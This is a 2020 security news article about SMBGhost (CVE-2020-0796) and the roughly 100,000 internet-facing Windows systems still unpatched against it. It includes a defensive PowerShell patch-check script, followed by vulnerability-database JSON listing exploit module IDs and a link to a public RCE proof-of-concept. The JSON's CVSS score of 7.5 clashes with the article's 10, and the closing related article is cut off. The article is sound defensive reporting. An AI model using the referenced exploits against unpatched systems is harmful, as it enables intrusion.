More than 100,000 Windows systems have not yet been updated to protect against a previously-patched, critical and wormable flaw in Windows called SMBGhost.
Microsoft patched the remote code-execution (RCE) flaw, tracked as [CVE-2020-0796, back in March](<https://threatpost.com/wormable-unpatched-microsoft-bug/153632/>); it affects Windows 10 and Windows Server 2019, and ranks 10 out of 10 on the CVSS scale. It exists in version 3.1.1 of the Microsoft Server Message Block (SMB) protocol, the same protocol that was targeted by the infamous [WannaCry ransomware](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>) in 2017.
“I’m unsure what method Shodan uses to determine whether a certain machine is vulnerable to SMBGhost, but if its detection mechanism is accurate, it would appear that there are still over 103,000 affected machines accessible from the internet,” Jan Kopriva, one of the researchers at the SANS Internet Storm Center, said in a [post on Wednesday](<https://isc.sans.edu/forums/diary/SMBGhost+the+critical+vulnerability+many+seem+to+have+forgotten+to+patch/26732/>).
According to Kopriva, the largest shares of these vulnerable systems are in Taiwan (22 percent), Japan (20 percent), Russia (11 percent) and the U.S. (9 percent).
Microsoft released its fix, KB4551762, as an update for Windows 10 (versions 1903 and 1909) and Windows Server 2019 (versions 1903 and 1909).
In lieu of a patch, Microsoft had noted in March that administrators can use PowerShell to disable SMBv3 compression, which blocks unauthenticated attackers from exploiting the vulnerability against an SMBv3 server. To protect clients from outside attacks, it’s necessary to block TCP port 445 at the enterprise perimeter firewall. Kopriva also tracked, via Shodan, the share of all IPs with port 445 open, and found that overall approximately 8 percent of all IPs have port 445 open.
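A per-host posture check for the patch and workarounds just described, added here as an example rather than taken from the article or from Microsoft's tooling. It assumes an elevated PowerShell session on Windows 10 or Windows Server 2019, maps the 1903 and 1909 releases to OS builds 18362 and 18363, and reads the LanmanServer `DisableCompression` registry value that Microsoft's advisory names for the SMBv3 compression workaround (the registry path is not quoted in the article; confirm it against the advisory).

```powershell
# Added example, not from the article: report whether this host is still exposed
# to SMBGhost (CVE-2020-0796) by checking the fix and the workarounds the article
# describes. Run elevated on Windows 10 / Windows Server 2019.

# Releases 1903 and 1909 correspond to builds 18362 and 18363 (assumption stated
# in the lead-in); other builds are reported as not in the affected set.
$affectedBuilds = @(18362, 18363)
$build = [System.Environment]::OSVersion.Version.Build
$isAffectedRelease = $affectedBuilds -contains $build

# Fix named in the article: KB4551762.
$patched = [bool](Get-HotFix -Id 'KB4551762' -ErrorAction SilentlyContinue)

# Workaround: SMBv3 compression disabled via the LanmanServer registry value
# from Microsoft's advisory (DWORD DisableCompression = 1).
$regPath = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$reg = Get-ItemProperty -Path $regPath -Name 'DisableCompression' -ErrorAction SilentlyContinue
$compressionOff = ($null -ne $reg) -and ($reg.DisableCompression -eq 1)

# Defence in depth: the article's guidance is to block TCP/445 at the perimeter;
# this additionally reports whether the host firewall has an enabled inbound block.
$rule445 = Get-NetFirewallPortFilter -ErrorAction SilentlyContinue |
    Where-Object { $_.Protocol -eq 'TCP' -and $_.LocalPort -eq 445 } |
    Get-NetFirewallRule |
    Where-Object { $_.Direction -eq 'Inbound' -and $_.Action -eq 'Block' -and $_.Enabled -eq 'True' }

# A host is considered exposed when it runs an affected release and has neither
# the patch nor the compression workaround applied.
[pscustomobject]@{
    Host               = $env:COMPUTERNAME
    Build              = $build
    AffectedRelease    = $isAffectedRelease
    KB4551762Present   = $patched
    SMBCompressionOff  = $compressionOff
    Inbound445Blocked  = [bool]$rule445
    ExposedToSMBGhost  = $isAffectedRelease -and -not $patched -and -not $compressionOff
}
```

Run it through `Invoke-Command` against a list of hosts to get a fleet-wide table of which machines still rely on the perimeter block alone.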
The chart below shows the number of vulnerable systems that are open to SMBGhost. Kopriva noted in a message to Threatpost that the “dips” in the data are presumably caused by Shodan re-scanning a large number of IP ranges.
![IP addresses detected as vulnerable to SMBGhost by Shodan](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/28154313/0-1.png>)
IP addresses detected as vulnerable to SMBGhost by Shodan. Credit: Jan Kopriva
The pressure is on for system administrators to patch their systems against SMBGhost, with various proof of concepts (PoCs) for the flaw being released over the past few months. While many attempts to exploit SMBGhost resulted only in denial of service or local privilege escalation, a PoC released in June by a researcher who goes by “Chompie,” and [announced on Twitter](<https://github.com/chompie1337/SMBGhost_RCE_PoC/blob/master/README.md>), achieved RCE.
“Since release of this PoC was again met with wide attention from the media, one might reasonably expect that by now, most of the vulnerable machines would have been patched – especially those accessible from the internet,” according to Kopriva.
These PoCs have also [spurred the Department of Homeland Security](<https://techxplore.com/news/2020-06-homeland-windows-worm.html>) to urge companies to update in June, saying that cybercriminals are targeting the unpatched systems: The agency “strongly recommends using a firewall to block server message block ports from the internet and to apply patches to critical- and high-severity vulnerabilities as soon as possible.”
{"id": "THREATPOST:38C104BCE62E9E24AEFF60D68D7C50BE", "type": "threatpost", "bulletinFamily": "info", "title": "Microsoft\u2019s SMBGhost Flaw Still Haunts 108K Windows Systems", "description": "More than 100,000 Windows systems have not yet been updated to protect against a previously-patched, critical and wormable flaw in Windows called SMBGhost.\n\nMicrosoft patched the remote code-execution (RCE) flaw bug tracked as [CVE-2020-0796 back in March](<https://threatpost.com/wormable-unpatched-microsoft-bug/153632/>); it affects Windows 10 and Windows Server 2019, and ranks 10 out of 10 on the CVSS scale. It exists in version 3.1.1 of the Microsoft Server Message Block (SMB) protocol, the same protocol that was targeted by the infamous [WannaCry ransomware](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>) in 2017.\n\n\u201cI\u2019m unsure what method Shodan uses to determine whether a certain machine is vulnerable to SMBGhost, but if its detection mechanism is accurate, it would appear that there are still over 103,000 affected machines accessible from the internet,\u201d Jan Kopriva, one of the researchers at the SANS Internet Storm Center, said in a [post on Wednesday](<https://isc.sans.edu/forums/diary/SMBGhost+the+critical+vulnerability+many+seem+to+have+forgotten+to+patch/26732/>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAccording to Kopriva, many of these vulnerable systems (22 percent) are in Taiwan, Japan (20 percent), Russia (11 percent) and the U.S. (9 percent).\n\nMicrosoft released its fix, KB4551762, as an update for Windows 10 (versions 1903 and 1909) and Windows Server 2019 (versions 1903 and 1909).\n\nIn lieu of a patch, Microsoft in March had noted that administrators can use PowerShell to disable SMBv3 compression, which will block unauthenticated attackers from exploiting the vulnerability against an SMBv3 server. 
To protect clients from outside attacks, it\u2019s necessary to block TCP port 445 at the enterprise perimeter firewall. Kopriva for his part also tracked a percentage of all IPs with an open port 445 via Shodan, and found that overall approximately 8 percent of all IPs have port 445 open.\n\nThe chart below shows the number of vulnerable systems that are open to SMBGhost. Kopriva noted in a message to Threatpost that the \u201cdips\u201d in the data are presumably caused by Shodan re-scanning a large number of IP ranges.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/28154313/0-1.png>)\n\nIP addresses detected as vulnerable to SMBGhost by Shodan. Credit: Jan Kopriva\n\nThe pressure is on for system administrators to patch their systems against SMBGhost, with various proof of concepts (PoCs) for the flaw being released over the past few months. While many attempts to exploit SMBGhost resulted only in denial of service or local privilege escalation, a PoC released in June by someone who goes by \u201cChompie,\u201d who announced [his exploit](<https://github.com/chompie1337/SMBGhost_RCE_PoC/blob/master/README.md>) to achieve RCE on Twitter.\n\n\u201cSince release of this PoC was again met with wide attention from the media, one might reasonably expect that by now, most of the vulnerable machines would have been patched \u2013 especially those accessible from the internet,\u201d according to Kopriva.\n\nThese PoCs have also [spurred the Department of Homeland Security](<https://techxplore.com/news/2020-06-homeland-windows-worm.html>) to urge companies to update in June, saying that cybercriminals are targeting the unpatched systems: The agency \u201cstrongly recommends using a firewall to block server message block ports from the internet and to apply patches to critical- and high-severity vulnerabilities as soon as possible.\u201d\n", "published": "2020-10-28T20:36:09", "modified": "2020-10-28T20:36:09", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://threatpost.com/microsofts-smbghost-flaw-108k-windows-systems/160682/", "reporter": "Lindsey O'Donnell", "references": ["https://threatpost.com/wormable-unpatched-microsoft-bug/153632/", "https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/", "https://isc.sans.edu/forums/diary/SMBGhost+the+critical+vulnerability+many+seem+to+have+forgotten+to+patch/26732/", "https://threatpost.com/newsletter-sign/", "https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/28154313/0-1.png", "https://github.com/chompie1337/SMBGhost_RCE_PoC/blob/master/README.md", "https://techxplore.com/news/2020-06-homeland-windows-worm.html"], "cvelist": ["CVE-2020-0796"], "lastseen": "2020-10-28T20:46:14", "viewCount": 557, "enchantments": {"dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:BBE7670A93BC8AF70B2207E0CEF64EAA"]}, {"type": "attackerkb", "idList": ["AKB:27DB2819-5039-4831-815A-798764488B88", "AKB:72CB57AD-D32C-43D3-86B8-F8B617707C5B", "AKB:E85583CB-111D-4D95-80E5-4CD53BB1F952", "AKB:ED05CA72-27C8-4C22-BFF9-2AE3451C549C"]}, {"type": "avleonov", "idList": ["AVLEONOV:24538B1ED96269982136AA43998E5780", "AVLEONOV:4FCA3B316DF1BAA7BC038015245D9813", "AVLEONOV:6A714F9BC2BBE696D3586B2629169491", "AVLEONOV:D8BE9238C3E35C438BC4D8515D78E548"]}, {"type": "canvas", "idList": ["SMBGHOST", "SMBGHOST_LPE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6D8B0D86C2C5A86632676E10E471547F"]}, {"type": "cert", "idList": ["VU:872016"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0136"]}, {"type": "cisa", "idList": ["CISA:2584F925B4D0F34C7EBE8E9D34FC72C7", "CISA:50FD88CEEFDE175A266C8EB09AC92D7D", "CISA:5FE14EDE9F5E20EB9536DC356A82AAB6", "CISA:9D38592E642AD30FA4BC435AC4FFC304"]}, {"type": "cve", "idList": ["CVE-2020-0796"]}, {"type": "exploitdb", "idList": ["EDB-ID:48216", "EDB-ID:48267", "EDB-ID:48537"]}, {"type": "exploitpack", "idList": 
["EXPLOITPACK:162FCF5EA0445C77E29A0F6775C5E7F6", "EXPLOITPACK:CFD5A967D4C18FB68D3D775FE9AAAA38"]}, {"type": "githubexploit", "idList": ["0522E1EF-0AC6-5DD5-A6DA-6BF91F5A89C4", "1B787DF3-D66A-5A51-AB8B-DA600B216482", "1D1C90C4-5D8F-58C4-B5AA-805F46862E47", "22C095F3-54B6-532B-AE10-73BEE3624D57", "23687103-A800-5907-929B-B3A41D121F1B", "243C313B-7F90-56EA-BE8E-35A8DFFAEDB2", "2C47C88A-DA77-535C-9BCD-4A89D8B02384", "2F2D8C81-E148-5A14-8750-9403AFEB21A8", "387719E9-0938-5546-95DA-D88EC7E3FF13", "484522F4-99E8-5FCE-9CB6-2DB46070E529", "4A6EBCA8-D007-5E59-94B8-7BDA780D94B5", "52AA3134-2731-589A-BE46-26ABB8039FE2", "5FB67B52-8BE9-5EE4-B573-CF49FD1579A5", "6F29B32B-8480-51E3-8B87-96FBE89C9ADD", "709F50E2-7719-5BDB-ABBF-7CF8A820C46F", "7B8853FF-7CB4-5F4D-B185-FE434458F43D", "935331CB-5C0B-5059-BAC4-383651C26C94", "9B986515-0778-5365-8693-2669FC74128A", "A0F56F7F-FBEC-52A7-8D05-19E0EF3E860F", "BDCD16BE-ECED-5F2A-994A-FBF6539639ED", "C8967016-587F-5098-AD59-ED5BF752FD5A", "D4A83665-CEF3-5877-9DA4-B03A23BF7461", "D6044381-6C6F-56BC-81B3-86E4B5FC5200", "D7ADE5F6-D414-5DF2-AEC2-92FB32E6041F", "DE92AD9C-F346-5416-A5F0-5AEC963C9F3B", "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E", "FA0B4B9E-5D12-55F9-9E66-FA9CF9AF1B72"]}, {"type": "kaspersky", "idList": ["KLA11693"]}, {"type": "kitploit", "idList": ["KITPLOIT:1370442080181927541", "KITPLOIT:3348929726444940519", "KITPLOIT:3440136498125856121", "KITPLOIT:3701426813255055656", "KITPLOIT:3872284907466902606", "KITPLOIT:4378915690459298496", "KITPLOIT:5374829754140275290", "KITPLOIT:5857572574369273543", "KITPLOIT:6298886136201302065", "KITPLOIT:6714457792986818120", "KITPLOIT:7720212798779518234", "KITPLOIT:7904361679234881900", "KITPLOIT:8455936192163161094"]}, {"type": "krebs", "idList": ["KREBS:1093D39181F7F724932AED0E8DA017A8", "KREBS:A05C5DFD2D31CCAAE49C4FBA8C7469E4"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2020_0796_SMBGHOST-", "MSF:EXPLOIT-WINDOWS-SMB-CVE_2020_0796_SMBGHOST-"]}, {"type": "mmpc", "idList": 
["MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:D6D537E875C3CBD84822A868D24B31BA", "MMPC:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "mscve", "idList": ["MS:ADV200005", "MS:CVE-2020-0796"]}, {"type": "mskb", "idList": ["KB4551762"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:7DAEE35F7BA48355264AFE712E62E793", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "myhack58", "idList": ["MYHACK58:62202097543"]}, {"type": "nessus", "idList": ["MICROSOFT_SMB_CVE-2020-0796.NASL", "SMB_MICROSOFT_WINDOWS_ADV200005.NASL", "SMB_MICROSOFT_WINDOWS_ADV200005_REMOTE.NASL", "SMB_NT_MS20_MAR_4551762.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310816800"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156732", "PACKETSTORM:157110"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:016288CBC518BC4CE318130A921071C2", "QUALYSBLOG:22A5C3C4F56D3B499B24DF2E1626F4C1", "QUALYSBLOG:9B7C3806B8C67809B298463FBE31A0A4"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:614648646663CF660156AD39ED9421B3", "RAPID7BLOG:D560044511D0D460EB8BD73E6B8C9EB7", "RAPID7BLOG:E36C557104ECB6E144C21C3C499B0492"]}, {"type": "securelist", "idList": ["SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB"]}, {"type": "talosblog", "idList": ["TALOSBLOG:136C0DF46D16B7D21DD712BDD956BC41"]}, {"type": "thn", "idList": ["THN:17F11846886656062FA1EA84D1C74534", "THN:882595A940E5AB15E8B9C472154ACA45", "THN:90048C5D2E69F2E769EE053B3E1555AA", "THN:F1DFBF3E8E6E5F3CD1282E08B3C3E35D"]}, {"type": "threatpost", "idList": ["THREATPOST:0EAD358006302B8EB3637C22334E13DC", "THREATPOST:12364EEB82CF1DBF8D357DF9FBB64126", "THREATPOST:1586A7AFAD80F6833B8727AD8E03DB79", "THREATPOST:2AAD8D184B893593E4E3B11FE31F97B3", "THREATPOST:A7995232CE91305C94B84BB400B1EA34", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", 
"THREATPOST:B2D0023D9A73CEE9C328A0927149D5B2", "THREATPOST:EC36CC2F4E891C402B4EBDBE9D92F9A8", "THREATPOST:F7C6EEE7081716FAE624B70FD91C4225"]}, {"type": "zdt", "idList": ["1337DAY-ID-34097", "1337DAY-ID-34105", "1337DAY-ID-34171", "1337DAY-ID-34206", "1337DAY-ID-34504"]}]}, "score": {"value": 0.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:27DB2819-5039-4831-815A-798764488B88", "AKB:E85583CB-111D-4D95-80E5-4CD53BB1F952", "AKB:ED05CA72-27C8-4C22-BFF9-2AE3451C549C"]}, {"type": "avleonov", "idList": ["AVLEONOV:4FCA3B316DF1BAA7BC038015245D9813", "AVLEONOV:6A714F9BC2BBE696D3586B2629169491", "AVLEONOV:D8BE9238C3E35C438BC4D8515D78E548"]}, {"type": "canvas", "idList": ["SMBGHOST", "SMBGHOST_LPE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6D8B0D86C2C5A86632676E10E471547F"]}, {"type": "cert", "idList": ["VU:872016"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0136"]}, {"type": "cisa", "idList": ["CISA:2584F925B4D0F34C7EBE8E9D34FC72C7", "CISA:50FD88CEEFDE175A266C8EB09AC92D7D", "CISA:9D38592E642AD30FA4BC435AC4FFC304"]}, {"type": "cve", "idList": ["CVE-2020-0796"]}, {"type": "exploitdb", "idList": ["EDB-ID:48216", "EDB-ID:48267", "EDB-ID:48537"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:CFD5A967D4C18FB68D3D775FE9AAAA38"]}, {"type": "githubexploit", "idList": ["0522E1EF-0AC6-5DD5-A6DA-6BF91F5A89C4", "1B787DF3-D66A-5A51-AB8B-DA600B216482", "1D1C90C4-5D8F-58C4-B5AA-805F46862E47", "22C095F3-54B6-532B-AE10-73BEE3624D57", "23687103-A800-5907-929B-B3A41D121F1B", "243C313B-7F90-56EA-BE8E-35A8DFFAEDB2", "2C47C88A-DA77-535C-9BCD-4A89D8B02384", "2F2D8C81-E148-5A14-8750-9403AFEB21A8", "387719E9-0938-5546-95DA-D88EC7E3FF13", "484522F4-99E8-5FCE-9CB6-2DB46070E529", "4A6EBCA8-D007-5E59-94B8-7BDA780D94B5", "52AA3134-2731-589A-BE46-26ABB8039FE2", "5FB67B52-8BE9-5EE4-B573-CF49FD1579A5", "6F29B32B-8480-51E3-8B87-96FBE89C9ADD", "709F50E2-7719-5BDB-ABBF-7CF8A820C46F", "7B8853FF-7CB4-5F4D-B185-FE434458F43D", 
"935331CB-5C0B-5059-BAC4-383651C26C94", "A0F56F7F-FBEC-52A7-8D05-19E0EF3E860F", "BDCD16BE-ECED-5F2A-994A-FBF6539639ED", "C8967016-587F-5098-AD59-ED5BF752FD5A", "D4A83665-CEF3-5877-9DA4-B03A23BF7461", "D6044381-6C6F-56BC-81B3-86E4B5FC5200", "D7ADE5F6-D414-5DF2-AEC2-92FB32E6041F", "DE92AD9C-F346-5416-A5F0-5AEC963C9F3B", "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E", "FA0B4B9E-5D12-55F9-9E66-FA9CF9AF1B72"]}, {"type": "kaspersky", "idList": ["KLA11693"]}, {"type": "kitploit", "idList": ["KITPLOIT:1370442080181927541", "KITPLOIT:3348929726444940519", "KITPLOIT:3440136498125856121", "KITPLOIT:3872284907466902606", "KITPLOIT:4378915690459298496", "KITPLOIT:5374829754140275290", "KITPLOIT:5857572574369273543", "KITPLOIT:6298886136201302065", "KITPLOIT:6714457792986818120", "KITPLOIT:7720212798779518234", "KITPLOIT:7904361679234881900", "KITPLOIT:8455936192163161094"]}, {"type": "krebs", "idList": ["KREBS:1093D39181F7F724932AED0E8DA017A8", "KREBS:A05C5DFD2D31CCAAE49C4FBA8C7469E4"]}, {"type": "mmpc", "idList": ["MMPC:D6D537E875C3CBD84822A868D24B31BA"]}, {"type": "mscve", "idList": ["MS:ADV200005", "MS:CVE-2020-0796"]}, {"type": "mskb", "idList": ["KB4551762"]}, {"type": "mssecure", "idList": ["MSSECURE:7DAEE35F7BA48355264AFE712E62E793", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA"]}, {"type": "myhack58", "idList": ["MYHACK58:62202097543"]}, {"type": "nessus", "idList": ["MICROSOFT_SMB_CVE-2020-0796.NASL", "SMB_MICROSOFT_WINDOWS_ADV200005_REMOTE.NASL", "SMB_NT_MS20_MAR_4551762.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310816800"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156732", "PACKETSTORM:157110"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:016288CBC518BC4CE318130A921071C2", "QUALYSBLOG:22A5C3C4F56D3B499B24DF2E1626F4C1", "QUALYSBLOG:9B7C3806B8C67809B298463FBE31A0A4"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:614648646663CF660156AD39ED9421B3"]}, {"type": "securelist", "idList": ["SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:136C0DF46D16B7D21DD712BDD956BC41"]}, {"type": "thn", "idList": ["THN:17F11846886656062FA1EA84D1C74534", "THN:882595A940E5AB15E8B9C472154ACA45", "THN:90048C5D2E69F2E769EE053B3E1555AA", "THN:F1DFBF3E8E6E5F3CD1282E08B3C3E35D"]}, {"type": "threatpost", "idList": ["THREATPOST:0EAD358006302B8EB3637C22334E13DC", "THREATPOST:12364EEB82CF1DBF8D357DF9FBB64126", "THREATPOST:1586A7AFAD80F6833B8727AD8E03DB79", "THREATPOST:A7995232CE91305C94B84BB400B1EA34", "THREATPOST:B2D0023D9A73CEE9C328A0927149D5B2", "THREATPOST:EC36CC2F4E891C402B4EBDBE9D92F9A8", "THREATPOST:F7C6EEE7081716FAE624B70FD91C4225"]}, {"type": "zdt", "idList": ["1337DAY-ID-34097", "1337DAY-ID-34105", "1337DAY-ID-34171"]}]}, "exploitation": null, "vulnersScore": 0.9}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660004461, "score": 1659955260}, "_internal": {"score_hash": "e8ee441c6d051c5e1fdac80568b88cbc"}}
{"threatpost": [{"lastseen": "2020-03-13T13:12:19", "description": "UPDATE\n\nMicrosoft released an emergency out-of-band patch to fix a SMBv3 wormable bug on Thursday that leaked earlier this week. The a patch for the vulnerability, tracked as CVE-2020-0796, is now rolling out to Windows 10 and Windows Server 2019 systems worldwide, according to Microsoft.\n\nOn Wednesday Microsoft warned of a wormable, unpatched remote code-execution vulnerability in the Microsoft Server Message Block protocol \u2013 the same protocol that was targeted by the infamous WannaCry ransomware in 2017. Microsoft released its fix, [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>), the following day as an update for Windows 10 (versions 1903 and 1909) and Windows Server 2019 (versions 1903 and 1909).\n\nThe critical bug affects Windows 10 and Windows Server 2019, and was not included in Microsoft\u2019s [Patch Tuesday release](<https://threatpost.com/microsoft-patches-bugs-march-update/153597/>) this week.\n\nThe bug can be found in version 3.1.1 of Microsoft\u2019s SMB file-sharing system. SMB allows multiple clients to access shared folders and can provide a rich playground for malware when it comes to lateral movement and client-to-client infection. 
This was played out in version 1 of SMB back in 2017, when the [WannaCry ransomware](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>) used the NSA-developed [EternalBlue SMB exploit](<https://threatpost.com/scanner-shows-eternalblue-vulnerability-unpatched-on-thousands-of-machines/126818/>) to self-propagate rapidly around the world.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn this case, \u201cto exploit the vulnerability against an SMB server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 server,\u201d Microsoft explained [in its advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200005#ID0EN>), issued Wednesday. \u201cTo exploit the vulnerability against an SMB client, an unauthenticated attacker would need to configure a malicious SMBv3 server and convince a user to connect to it.\u201d\n\nMicrosoft issued its advisory only after details of the bug were published online by Cisco Talos and Fortinet. The firms\u2019 disclosure was an apparent miscommunication with Microsoft \u2013 both posts have since been taken down.\n\nAccording to [Duo Security](<https://duo.com/decipher/microsoft-advisory-warns-of-smbv3-flaw>), Fortinet had described the issue as a \u201cBuffer Overflow Vulnerability in Microsoft SMB Servers\u201d and said it could be used to execute arbitrary code within the context of the application. Cisco Talos meanwhile warned that a \u201cwormable\u201d attack would be able to exploit the vulnerability to \u201cmove from victim to victim.\u201d\n\nThreatpost reached out to both firms for additional details. Cisco Talos told Threatpost, \u201cOn March 10, information on an in-process effort was inadvertently posted and then promptly deleted from the Talos blog because it was not finalized. As a matter of policy, we do not discuss research that has not yet been approved for public disclosure. 
We are aware that this may have caused some confusion and will follow up when we have more to offer.\u201d\n\nWhile the bug is dangerous, researchers said this bug likely won\u2019t lead to \u201cWannaCry 2.0.\u201d\n\n\u201cConsidering that SMBv3 is not as widely used as SMBv1, the potential immediate impact of this threat is most likely lower than past vulnerabilities,\u201d Richard Melick, senior technical product manager at Automox, told Threatpost. \u201cBut that does not mean organizations should be disregarding any endpoint hardening that can happen now while Microsoft works on a patch\u2026it\u2019s better to respond today and disable SMBv3 and block TCP port 445. Respond now and vulnerabilities end today.\u201d\n\nJake Williams, founder of security firm Rendition Security, [said on Twitter](<https://twitter.com/MalwareJake/status/1237512617817751552>) that the risk of exploitation is mitigated by kernel protections \u2013 specifically kernel address space layout randomization (KASLR). KASLR randomly arranges the address space positions of key data areas of a given process. It essentially means that an attacker can\u2019t establish one attack path and use it over and over again.\n\n\u201cCore SMB sits in kernel space and KASLR is great at mitigating exploitation,\u201d tweeted Williams. \u201cAssuming this is kernel space, any unsuccessful exploitation results in [the blue screen of death] BSOD.\u201d He added, \u201cEven with trigger code, you still have to remotely bypass KASLR (not an easy task). If you need proof, [look at BUCKEYE](<https://symantec-blogs.broadcom.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit>). They had the EternalBlue trigger, but had to chain it with another information disclosure vulnerability to gain code execution. This isn\u2019t easy.\u201d\n\nSo far, there\u2019s no evidence that the vulnerability had been exploited in the wild, Microsoft said in the advisory. 
However, Melick said to proceed with caution.\n\n\u201cThere are still too many unknowns to say how effective this wormable vulnerability could be; is it going to be as easy as EternalBlue to implement or will it have the same difficulties as BlueKeep?\u201d Melick noted \u2013 the latter in reference to the [wormable bug](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>) disclosed last year that some feared would lead to another WannaCry-level event. Exploits for BlueKeep however have so far [fallen well short](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) of researchers\u2019 initial fears.\n\nIn lieu of a patch, Microsoft on Wednesday noted that administrators can use PowerShell to disable SMBv3 compression, which will block unauthenticated attackers from exploiting the vulnerability against an SMBv3 server.\n\nTo protect clients from outside attacks, it\u2019s necessary to block TCP port 445 at the enterprise perimeter firewall.\n\n\u201cTCP port 445 is used to initiate a connection with the affected component,\u201d Microsoft noted. \u201cBlocking this port at the network perimeter firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. This can help protect networks from attacks that originate outside the enterprise perimeter. Blocking the affected ports at the enterprise perimeter is the best defense to help avoid internet-based attacks.\u201d\n\nHowever, systems could still be vulnerable to attacks from within the enterprise perimeter \u2013 so once attackers penetrate the corporate network, they could use an exploit to move around in an unfettered way. 
Microsoft has published [general guidelines](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>) to prevent lateral connections.\n\n**_Interested in security for the Internet of Things and how 5G will change things? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n\n_(This article was updated March 12 with the news that Microsoft has released a patch for CVE-2020-0796)_\n", "cvss3": {}, "published": "2020-03-11T17:13:53", "type": "threatpost", "title": "Wormable, Unpatched Microsoft Bug Threatens Corporate LANs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-11T17:13:53", "id": "THREATPOST:EC36CC2F4E891C402B4EBDBE9D92F9A8", "href": "https://threatpost.com/wormable-unpatched-microsoft-bug/153632/?utm_source=rss&utm_medium=rss&utm_campaign=wormable-unpatched-microsoft-bug", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-04-11T11:41:40", "description": "Marcus Hutchins, the researcher hailed for squashing the WannaCry ransomware outbreak in May 2017, has been spared jail time over the creation of the infamous Kronos banking malware.\n\nThe 25-year-old British researcher was sentenced on Friday to time served and one year of supervised release over charges relating to the creation of the Kronos malware, [according to reports](<https://twitter.com/emptywheel/status/1154806457189175301>).\n\nThe sentencing of Hutchins, known for his online Twitter name and blog \u2018MalwareTech,\u2019 has drawn international interest as the researcher has been hailed 
as a hero for his part in stopping the global [WannaCry outbreak in 2017](<https://threatpost.com/wannacry-bitcoin-withdrawn-killswitch-researcher-detained-in-nevada/127182/>). He was detained not long after in August 2017.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cSentenced to time served! Incredibly thankful for the understanding and leniency of the judge, the wonderful character letter you all sent, and everyone who helped me through the past two years, both financially and emotionally,\u201d the researcher said on his Twitter account after the sentencing.\n\n> Sentenced to time served! Incredibly thankful for the understanding and leniency of the judge, the wonderful character letter you all sent, and everyone who helped me through the past two years, both financially and emotionally.\n> \n> \u2014 MalwareTech (@MalwareTechBlog) [July 26, 2019](<https://twitter.com/MalwareTechBlog/status/1154820057085677570?ref_src=twsrc%5Etfw>)\n\nHutchins was [indicted](<https://threatpost.com/wannacry-hero-arrested-one-of-two-charged-with-distribution-of-kronos-malware/127186/>) in 2017 and charged with writing the [Kronos malware](<https://threatpost.com/kronos-banking-trojan-resurfaces-after-years-of-silence/134364/>), a banking trojan first discovered in 2014 that is capable of stealing credentials and using web injects for banking websites. Hutchins and another individual whose name was redacted from the original indictment, allegedly advertised the malware for sale on a number of internet forums, including the dismantled [AlphaBay](<https://threatpost.com/us-european-law-enforcement-shutter-massive-alphabay-market/126947/>) market.\n\nHutchins filed a [plea 